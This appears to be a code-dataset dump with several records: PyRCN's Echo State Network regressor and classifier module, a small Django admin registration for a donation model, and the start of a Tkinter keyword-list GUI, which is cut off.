regressor.\n\n Parameters\n ----------\n other : ESNRegressor\n ```ESNRegressor``` to be added to ```self```\n\n Returns\n -------\n self : returns the sum of two ```ESNRegressor``` instances.\n \"\"\"\n if other == 0:\n return self\n else:\n return self.__add__(other)\n\n def get_params(self, deep: bool = True) -> Dict:\n \"\"\"Get all parameters of the ESNRegressor.\"\"\"\n if deep:\n return 
{**self.input_to_node.get_params(),\n                    **self.node_to_node.get_params(),\n                    **{\"alpha\": self.regressor.get_params()[\"alpha\"]}}\n        else:\n            return {\"input_to_node\": self.input_to_node,\n                    \"node_to_node\": self.node_to_node,\n                    \"regressor\": self.regressor,\n                    \"requires_sequence\": self._requires_sequence}\n\n    def set_params(self, **parameters: dict) -> ESNRegressor:\n        \"\"\"Set all possible parameters of the ESNRegressor.\"\"\"\n        i2n_params = self.input_to_node._get_param_names()\n        self.input_to_node = self.input_to_node.set_params(\n            **{key: parameters[key] for key in parameters.keys()\n               if key in i2n_params})\n        n2n_params = self.node_to_node._get_param_names()\n        self.node_to_node = self.node_to_node.set_params(\n            **{key: parameters[key] for key in parameters.keys()\n               if key in n2n_params})\n        reg_params = self.regressor._get_param_names()\n        self.regressor = self.regressor.set_params(\n            **{key: parameters[key] for key in parameters.keys()\n               if key in reg_params})\n        for parameter, value in parameters.items():\n            if parameter in self.get_params(deep=False):\n                setattr(self, parameter, value)\n\n        return self\n\n    def _check_if_sequence(self, X: np.ndarray, y: np.ndarray) -> None:\n        \"\"\"\n        Validation of the training data.\n\n        If X is a list and each member of the list has the same number of\n        samples, we treat it as an array of instances (one sequence).\n\n        If X or y have more than two dimensions, it is not a valid data type.\n\n        If the number of dimensions of X after converting it to a\n        ```ndarray``` is one, the ESN runs in sequential mode.\n\n        Parameters\n        ----------\n        X : np.ndarray\n            The input data\n        y : np.ndarray\n            The target data\n        \"\"\"\n        if X.ndim > 2 or y.ndim > 2:\n            raise ValueError(\"Could not determine a valid structure,\"\n                             \"because X has {0} and y has {1} dimensions.\"\n                             \"Only 1 or 2 dimensions allowed.\"\n                             .format(X.ndim, y.ndim))\n        self.requires_sequence = X.ndim == 1\n\n    def _check_if_sequence_to_value(self,\n                                    X: np.ndarray, y: np.ndarray) -> None:\n        \"\"\"\n        Validation of the training data.\n\n        If the numbers of samples in each element of (X, y) in sequential form\n        are different, we assume to have a sequence-to-value problem,\n        such as a sequence-to-label classification.\n\n        Parameters\n        ----------\n        X : np.ndarray\n            The input data\n        y : np.ndarray\n            The target data\n        \"\"\"\n        len_X = np.unique([x.shape[0] for x in X])\n        len_y = np.unique([yt.shape[0] for yt in y])\n        self._sequence_to_value = not np.any(len_X == len_y)\n\n    def partial_fit(self, X: np.ndarray, y: np.ndarray,\n                    transformer_weights: Union[None, np.ndarray] = None,\n                    postpone_inverse: bool = False) -> ESNRegressor:\n        \"\"\"\n        Fit the regressor partially.\n\n        Parameters\n        ----------\n        X : ndarray of shape (n_samples, n_features)\n        y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n            The targets to predict.\n        transformer_weights : ignored\n        postpone_inverse : bool, default=False\n            If the output weights have not been fitted yet, regressor might be\n            hinted at postponing inverse calculation.
Refer to\n ```IncrementalRegression```\n for details.\n\n Returns\n -------\n self : Returns a trained ```ESNRegressor``` model.\n \"\"\"\n self._validate_hyperparameters()\n self._validate_data(X=X, y=y, multi_output=True)\n\n # input_to_node\n try:\n hidden_layer_state = self._input_to_node.transform(X)\n except NotFittedError as e:\n if self.verbose:\n print('input_to_node has not been fitted yet: {0}'.format(e))\n hidden_layer_state = self._input_to_node.fit_transform(X)\n pass\n\n # node_to_node\n try:\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n except NotFittedError as e:\n if self.verbose:\n print('node_to_node has not been fitted yet: {0}'.format(e))\n hidden_layer_state = self._node_to_node.fit_transform(\n hidden_layer_state)\n pass\n\n # regression\n if not hasattr(self._regressor, 'partial_fit') and postpone_inverse:\n raise BaseException('Regressor has no attribute partial_fit, got'\n '{0}'.format(self._regressor))\n elif not hasattr(self._regressor, 'partial_fit') \\\n and not postpone_inverse:\n self._regressor.fit(hidden_layer_state, y)\n elif hasattr(self._regressor, 'partial_fit'):\n self._regressor.partial_fit(\n hidden_layer_state, y, postpone_inverse=postpone_inverse)\n return self\n\n def fit(self, X: np.ndarray, y: np.ndarray,\n n_jobs: Union[int, np.integer, None] = None,\n transformer_weights: Optional[np.ndarray] = None) -> ESNRegressor:\n \"\"\"\n Fit the regressor.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features) or of shape (n_sequences,)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n or of shape (n_sequences)\n The targets to predict.\n n_jobs : Optional[int, np.integer], default=None\n The number of jobs to run in parallel. ```-1``` means using all\n processors.\n See :term:`Glossary ` for more details.\n transformer_weights : Optional[np.ndarray] = None\n ignored\n\n Returns\n -------\n self : Returns a trained ESNRegressor model.\n \"\"\"\n self._validate_hyperparameters()\n if self.requires_sequence == \"auto\":\n self._check_if_sequence(X, y)\n if self.requires_sequence:\n self._input_to_node.fit(X[0])\n self._node_to_node.fit(self._input_to_node.transform(X[0]))\n X, y, sequence_ranges = concatenate_sequences(X, y)\n else:\n self._validate_data(X, y, multi_output=True)\n self._input_to_node.fit(X)\n self._node_to_node.fit(self._input_to_node.transform(X))\n # self._regressor = self._regressor.__class__()\n if self.requires_sequence:\n return self._sequence_fit(X, y, sequence_ranges, n_jobs)\n else:\n return self.partial_fit(X, y, postpone_inverse=False)\n\n def _sequence_fit(self, X: np.ndarray, y: np.ndarray,\n sequence_ranges: np.ndarray,\n n_jobs: Union[int, np.integer,\n None] = None) -> ESNRegressor:\n \"\"\"\n Call partial_fit for each sequence. Runs parallel if more than one job.\n\n Parameters\n ----------\n X : ndarray of shape (samples, n_features)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n The targets to predict.\n sequence_ranges : ndarray of shape (n_sequences, 2)\n The start and stop indices of each sequence are denoted here.\n n_jobs : Union[int, np.integer, None], default=None\n The number of jobs to run in parallel. 
```-1``` means using all\n processors.\n See :term:`Glossary ` for more details.\n\n Returns\n -------\n self : Returns a trained ESNRegressor model.\n \"\"\"\n if n_jobs is not None and n_jobs > 1:\n reg = Parallel(n_jobs=n_jobs)(delayed(ESNRegressor.partial_fit)\n (clone(self), X[idx[0]:idx[1], ...],\n y[idx[0]:idx[1], ...],\n postpone_inverse=True)\n for idx in sequence_ranges[:-1])\n reg = sum(reg)\n self._regressor = reg._regressor\n else:\n [ESNRegressor.partial_fit(self,\n X[idx[0]:idx[1], ...],\n y[idx[0]:idx[1], ...],\n postpone_inverse=True)\n for idx in sequence_ranges[:-1]]\n\n # last sequence, calculate inverse and bias\n ESNRegressor.partial_fit(self, X=X[sequence_ranges[-1][0]:, ...],\n y=y[sequence_ranges[-1][0]:, ...],\n postpone_inverse=False)\n return self\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the targets using the trained ```ESNRegressor```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n\n Returns\n -------\n y : ndarray of (n_samples,) or (n_samples, n_targets)\n The predicted targets\n \"\"\"\n if self._input_to_node is None or self._regressor is None:\n raise NotFittedError(self)\n\n if self.requires_sequence is False:\n # input_to_node\n hidden_layer_state = self._input_to_node.transform(X)\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n # regression\n return self._regressor.predict(hidden_layer_state)\n else:\n y = np.empty(shape=X.shape, dtype=object)\n for k, seq in enumerate(X):\n # input_to_node\n hidden_layer_state = self._input_to_node.transform(seq)\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n # regression\n y[k] = self._regressor.predict(hidden_layer_state)\n return y\n\n def _validate_hyperparameters(self) -> None:\n \"\"\"Validate the hyperparameters.\"\"\"\n if not (hasattr(self.input_to_node, \"fit\")\n and hasattr(self.input_to_node, \"fit_transform\")\n and hasattr(self.input_to_node, \"transform\")):\n raise TypeError(\"All input_to_node should be transformers and\"\n \"implement fit and transform '{0}' (type {1}) \"\n \"doesn't\".format(self.input_to_node,\n type(self.input_to_node)))\n\n if not (hasattr(self.node_to_node, \"fit\")\n and hasattr(self.node_to_node, \"fit_transform\")\n and hasattr(self.node_to_node, \"transform\")):\n raise TypeError(\"All node_to_node should be transformers and\"\n \"implement fit and transform '{0}' (type {1}) \"\n \"doesn't\".format(self.node_to_node,\n type(self.node_to_node)))\n\n if (self._requires_sequence != \"auto\"\n and not isinstance(self._requires_sequence, bool)):\n raise ValueError('Invalid value for requires_sequence, got {0}'\n .format(self._requires_sequence))\n\n if not is_regressor(self._regressor):\n raise TypeError(\"The last step should be a regressor and \"\n \"implement fit and predict '{0}' (type {1})\"\n \"doesn't\".format(self._regressor,\n type(self._regressor)))\n\n def __sizeof__(self) -> int:\n \"\"\"\n Return the size of the object in bytes.\n\n Returns\n -------\n size : int\n Object memory in bytes.\n \"\"\"\n return object.__sizeof__(self) + sys.getsizeof(self._input_to_node) + \\\n sys.getsizeof(self._node_to_node) + sys.getsizeof(self._regressor)\n\n @property\n def regressor(self) -> Union[LinearModel, IncrementalRegression]:\n \"\"\"\n Return the regressor.\n\n Returns\n -------\n regressor : LinearModel\n \"\"\"\n return self._regressor\n\n @regressor.setter\n def regressor(self, regressor: Union[LinearModel,\n IncrementalRegression]) -> None:\n \"\"\"\n 
Set the regressor.\n\n Parameters\n ----------\n regressor : LinearModel\n \"\"\"\n self._regressor = regressor\n\n @property\n def input_to_node(self) -> InputToNode:\n \"\"\"\n Return the input_to_node Transformer.\n\n Returns\n -------\n input_to_node : InputToNode\n \"\"\"\n return self._input_to_node\n\n @input_to_node.setter\n def input_to_node(self, input_to_node: InputToNode) -> None:\n \"\"\"\n Set the input_to_node Estimator.\n\n Parameters\n ----------\n input_to_node : InputToNode\n \"\"\"\n self._input_to_node = input_to_node\n\n @property\n def node_to_node(self) -> NodeToNode:\n \"\"\"\n Return the node_to_node Transformer.\n\n Returns\n -------\n node_to_node : NodeToNode\n \"\"\"\n return self._node_to_node\n\n @node_to_node.setter\n def node_to_node(self, node_to_node: NodeToNode) -> None:\n \"\"\"\n Set the node_to_node Transformer.\n\n Parameters\n ----------\n node_to_node : NodeToNode\n \"\"\"\n self._node_to_node = node_to_node\n\n def hidden_layer_state(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Return the hidden_layer_state, e.g. the reservoir state over time.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n\n Returns\n -------\n hidden_layer_state : ndarray of (n_samples,)\n The hidden_layer_state, e.g. the reservoir state over time.\n \"\"\"\n if self._input_to_node is None:\n raise NotFittedError(self)\n\n if self.requires_sequence is False:\n # input_to_node\n hidden_layer_state = self._input_to_node.transform(X)\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n else:\n hidden_layer_state = np.empty(shape=X.shape, dtype=object)\n for k, seq in enumerate(X):\n # input_to_node\n hls = self._input_to_node.transform(seq)\n hls = self._node_to_node.transform(hls)\n hidden_layer_state[k] = hls\n return hidden_layer_state\n\n @property\n def sequence_to_value(self) -> bool:\n \"\"\"\n Return the sequence_to_value parameter.\n\n Returns\n -------\n sequence_to_value : bool\n \"\"\"\n return self._sequence_to_value\n\n @sequence_to_value.setter\n def sequence_to_value(self, sequence_to_value: bool) -> None:\n \"\"\"\n Set the sequence_to_value parameter.\n\n Parameters\n ----------\n sequence_to_value : bool\n \"\"\"\n self._sequence_to_value = sequence_to_value\n\n @property\n def decision_strategy(self) -> Literal[\"winner_takes_all\",\n \"median\", \"last_value\"]:\n \"\"\"\n Return the decision_strategy parameter.\n\n Returns\n -------\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"]\n \"\"\"\n return self._decision_strategy\n\n @decision_strategy.setter\n def decision_strategy(self, decision_strategy: Literal[\"winner_takes_all\",\n \"median\",\n \"last_value\"])\\\n -> None:\n \"\"\"\n Set the requires_sequence parameter.\n\n Parameters\n ----------\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"]\n \"\"\"\n self._decision_strategy = decision_strategy\n\n @property\n def requires_sequence(self) -> Union[Literal[\"auto\"], bool]:\n \"\"\"\n Return the requires_sequence parameter.\n\n Returns\n -------\n requires_sequence : Union[Literal[\"auto\"], bool]\n \"\"\"\n return self._requires_sequence\n\n @requires_sequence.setter\n def requires_sequence(self,\n requires_sequence: Union[Literal[\"auto\"], bool])\\\n -> None:\n \"\"\"\n Set the requires_sequence parameter.\n\n Parameters\n ----------\n requires_sequence : Union[Literal[\"auto\"], bool]\n\n \"\"\"\n self._requires_sequence = requires_sequence\n\n\nclass ESNClassifier(ESNRegressor, 
ClassifierMixin):\n \"\"\"\n Echo State Network classifier.\n\n This model optimizes the mean squared error loss function using\n linear regression.\n\n Parameters\n ----------\n input_to_node : Optional[InputToNode], default=None\n Any ```InputToNode``` object that transforms the inputs.\n If ```None```, a ```pyrcn.base.blocks.InputToNode```\n object is instantiated.\n node_to_node : Optional[NodeToNode], default=None\n Any ```NodeToNode``` object that transforms the outputs of\n ```input_to_node```.\n If ```None```, a ```pyrcn.base.blocks.NodeToNode()```\n object is instantiated.\n regressor : Union[IncrementalRegression, LinearModel, None], default=None\n Regressor object such as derived from ``LinearModel``. This\n regressor will automatically be cloned each time prior to fitting.\n If ```None```, a ```pyrcn.linear_model.IncrementalRegression()```\n object is instantiated.\n requires_sequence : Union[Literal[\"auto\"], bool], default=\"auto\"\n If True, the input data is expected to be a sequence.\n If \"auto\", tries to automatically estimate when calling ```fit```\n for the first time\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"],\n default='winner_takes_all'\n Decision strategy for sequence-to-label task.\n Ignored if the target output is a sequence\n verbose : bool = False\n Verbosity output\n kwargs : Any, default = None\n keyword arguments passed to the subestimators if this is desired.\n \"\"\"\n\n @_deprecate_positional_args\n def __init__(self, *,\n input_to_node: Optional[InputToNode] = None,\n node_to_node: Optional[NodeToNode] = None,\n regressor: Union[IncrementalRegression,\n LinearModel, None] = None,\n requires_sequence: Union[Literal[\"auto\"], bool] = \"auto\",\n decision_strategy: Literal[\"winner_takes_all\", \"median\",\n \"last_value\"] = \"winner_takes_all\",\n verbose: bool = False,\n **kwargs: Any) -> None:\n \"\"\"Construct the ESNClassifier.\"\"\"\n super().__init__(input_to_node=input_to_node,\n node_to_node=node_to_node, regressor=regressor,\n requires_sequence=requires_sequence, verbose=verbose,\n **kwargs)\n self._decision_strategy = decision_strategy\n self._encoder = LabelBinarizer()\n self._sequence_to_value = False\n\n def partial_fit(self, X: np.ndarray, y: np.ndarray,\n transformer_weights: Optional[np.ndarray] = None,\n postpone_inverse: bool = False,\n classes: Optional[np.ndarray] = None) -> ESNClassifier:\n \"\"\"\n Fit the regressor partially.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n The targets to predict.\n classes : Optional[np.ndarray], default=None\n Classes across all calls to partial_fit.\n Can be obtained via `np.unique(y_all)`, where y_all is the\n target vector of the entire dataset.\n This argument is required for the first call to partial_fit\n and can be omitted in the subsequent calls.\n Note that y doesn't need to contain all labels in `classes`.\n transformer_weights : Optional[ndarray], default=None\n ignored\n postpone_inverse : bool, default=False\n If the output weights have not been fitted yet, regressor might be\n hinted at postponing inverse calculation. 
Refer to\n IncrementalRegression for details.\n\n Returns\n -------\n self : returns a trained ESNClassifier model\n \"\"\"\n self._validate_data(X, y, multi_output=True)\n self._encoder.fit(classes)\n super().partial_fit(X, self._encoder.transform(y),\n transformer_weights=None,\n postpone_inverse=postpone_inverse)\n return self\n\n def fit(self, X: np.ndarray, y: np.ndarray,\n n_jobs: Union[int, np.integer, None] = None,\n transformer_weights: Union[None,\n np.ndarray] = None) -> ESNClassifier:\n \"\"\"\n Fit the classifier.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features) or of shape (n_sequences,)\n y : ndarray of shape (n_samples,) or (n_samples, n_classes)\n or of shape (n_sequences)\n The targets to predict.\n n_jobs : int, default=None\n The number of jobs to run in parallel. ```-1``` means using all\n processors.\n See :term:`Glossary ` for more details.\n transformer_weights : ignored\n\n Returns\n -------\n self : Returns a trained ESNClassifier model.\n \"\"\"\n self._validate_hyperparameters()\n if self.requires_sequence == \"auto\":\n self._check_if_sequence(X, y)\n if self.requires_sequence:\n self._input_to_node.fit(X[0])\n self._node_to_node.fit(self._input_to_node.transform(X[0]))\n self._check_if_sequence_to_value(X, y)\n X, y, sequence_ranges = concatenate_sequences(\n X, y, sequence_to_value=self._sequence_to_value)\n else:\n self._validate_data(X, y, multi_output=True)\n self._input_to_node.fit(X)\n self._node_to_node.fit(self._input_to_node.transform(X))\n self._encoder = LabelBinarizer().fit(y)\n y = self._encoder.transform(y)\n # self._regressor = self._regressor.__class__()\n if self.requires_sequence:\n return self._sequence_fit(X, y, sequence_ranges, n_jobs)\n else:\n super().partial_fit(X, y)\n return self\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the classes using the trained ```ESNClassifier```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y_pred : ndarray of shape (n_samples,) or (n_samples, n_classes)\n The predicted classes.\n \"\"\"\n y = super().predict(X)\n if self.requires_sequence and self._sequence_to_value:\n for k, _ in enumerate(y):\n y[k] = MatrixToValueProjection(\n output_strategy=self._decision_strategy)\\\n .fit_transform(y[k])\n return y\n elif self.requires_sequence:\n for k, _ in enumerate(y):\n y[k] = self._encoder.inverse_transform(y[k], threshold=None)\n return y\n else:\n return self._encoder.inverse_transform(super().predict(X),\n threshold=None)\n\n def predict_proba(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the probability estimated using a trained ```ESNClassifier```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y_pred : ndarray of shape (n_samples,) or (n_samples, n_classes)\n The predicted probability estimates.\n \"\"\"\n y = super().predict(X)\n if self.requires_sequence and self._sequence_to_value:\n for k, _ in enumerate(y):\n y[k] = MatrixToValueProjection(\n output_strategy=self._decision_strategy, needs_proba=True)\\\n .fit_transform(y[k])\n y[k] = np.clip(y[k], a_min=1e-5, a_max=None)\n return y\n elif self.requires_sequence:\n for k, _ in enumerate(y):\n y[k] = np.clip(y[k], a_min=1e-5, a_max=None)\n return y\n else:\n return np.asarray(np.clip(y, a_min=1e-5, a_max=None))\n\n def predict_log_proba(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the log probability estimated using a trained\n 
```ESNClassifier```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y_pred : ndarray of shape (n_samples,) or (n_samples, n_classes)\n The predicted logarithmic probability estimated.\n \"\"\"\n if self.requires_sequence:\n y = self.predict_proba(X=X)\n for k, _ in enumerate(y):\n y[k] = np.log(y[k])\n return y\n else:\n return np.log(self.predict_proba(X=X))\n", "repo_name": "TUD-STKS/PyRCN", "sub_path": "src/pyrcn/echo_state_network/_esn.py", "file_name": "_esn.py", "file_ext": "py", "file_size_in_byte": 31831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 79, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.version_info", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.MultiOutputMixin", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.RegressorMixin", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 70, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 71, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 72, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 72, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 74, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 74, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 78, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 81, "usage_type": "call"}, {"api_name": "base.blocks.InputToNode", "line_number": 82, "usage_type": "call"}, {"api_name": "base.blocks.NodeToNode", "line_number": 91, "usage_type": "call"}, {"api_name": "base.blocks.NodeToNode", "line_number": 92, "usage_type": "call"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 101, "usage_type": "call"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.utils.validation._deprecate_positional_args", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 186, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 232, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 233, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 233, "usage_type": "attribute"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 260, "usage_type": "name"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 270, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 289, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 290, "usage_type": "name"}, 
{"api_name": "numpy.integer", "line_number": 290, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 291, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 291, "usage_type": "attribute"}, {"api_name": "util.concatenate_sequences", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 329, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 330, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 331, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 331, "usage_type": "attribute"}, {"api_name": "joblib.Parallel", "line_number": 353, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 353, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 373, "usage_type": "attribute"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 397, "usage_type": "call"}, {"api_name": "sklearn.base.is_regressor", "line_number": 430, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 445, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 446, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 449, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 449, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 449, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 460, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 460, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 461, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 472, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 483, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 494, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 505, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 515, "usage_type": "attribute"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 529, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 537, "usage_type": "call"}, {"api_name": "typing_extensions.Literal", "line_number": 568, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 594, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 594, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 606, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 606, "usage_type": "name"}, {"api_name": "sklearn.base.ClassifierMixin", "line_number": 619, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 658, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 658, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 659, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 659, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 660, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 660, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 661, 
"usage_type": "name"}, {"api_name": "typing.Union", "line_number": 662, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 662, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 663, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 666, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 673, "usage_type": "call"}, {"api_name": "sklearn.utils.validation._deprecate_positional_args", "line_number": 656, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 676, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 677, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 677, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 679, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 679, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 713, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 714, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 714, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 715, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 716, "usage_type": "attribute"}, {"api_name": "util.concatenate_sequences", "line_number": 743, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 749, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 758, "usage_type": "attribute"}, {"api_name": "projection.MatrixToValueProjection", "line_number": 775, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 787, "usage_type": "attribute"}, {"api_name": "projection.MatrixToValueProjection", "line_number": 804, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 814, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 814, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 816, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 834, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 837, "usage_type": "call"}]} +{"seq_id": "14592796915", "text": "# pylint: disable=R0904\n\nfrom django.contrib import admin\nfrom website.apwan.models.donation import Donation\n\n__author__ = 'Dean Gardiner'\n\n\nclass DonationAdmin(admin.ModelAdmin):\n list_display = (\n 'id', 'recipient', 'state', 'payer_name',\n 'amount', 'tip', 'currency'\n )\nadmin.site.register(Donation, DonationAdmin)\n", "repo_name": "FructusCode/website", "sub_path": "website/apwan/admin/donation.py", "file_name": "donation.py", "file_ext": "py", "file_size_in_byte": 338, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 14, "usage_type": "call"}, {"api_name": "website.apwan.models.donation.Donation", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "20861755841", "text": "#Standard 
Modules\nfrom Tkinter import *\nimport tkFileDialog\nfrom ScrolledText import *\nfrom collections import defaultdict\nimport csv\nimport os\n\n#Custom Modules\nfrom keywordGroupObject import word_grouper\nfrom Scraper import Suggest, Suggestions\n#import Suggestions\n\nclass ImportList(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\t#Frame for import canvas\n\t\tself.importListFrame = Frame(root, bg=\"gray\", borderwidth=1, width=75)\n\t\tself.importListFrame.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Canvas for list of keywords\n\t\tlist1Canvas = Canvas(self.importListFrame, bg='gray', height=100, width=75)\n\t\tlist1Canvas.pack(fill=BOTH, expand=True, side=TOP)\n\n\t\t#Scrollbar for Import List\n\t\tlist1Scroll = Scrollbar(list1Canvas)\n\t\tlist1Scroll.pack(side=RIGHT, fill=Y)\n\n\t\t#The Import list is a listbox that will take the keywords imported from file\n\t\tself.importList = Listbox(list1Canvas, relief=FLAT, selectmode=\"extended\")\n\t\tself.importList.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Set the scrolling for the ListBox\n\t\tself.importList.config(yscrollcommand=list1Scroll.set)\n\t\tlist1Scroll.config(command=self.importList.yview)\n\n\t\tself.importList.bind(\"<Delete>\", self.parent.del_word_key)\n\nclass Buttons(Frame):\n\tdef __init__(self, 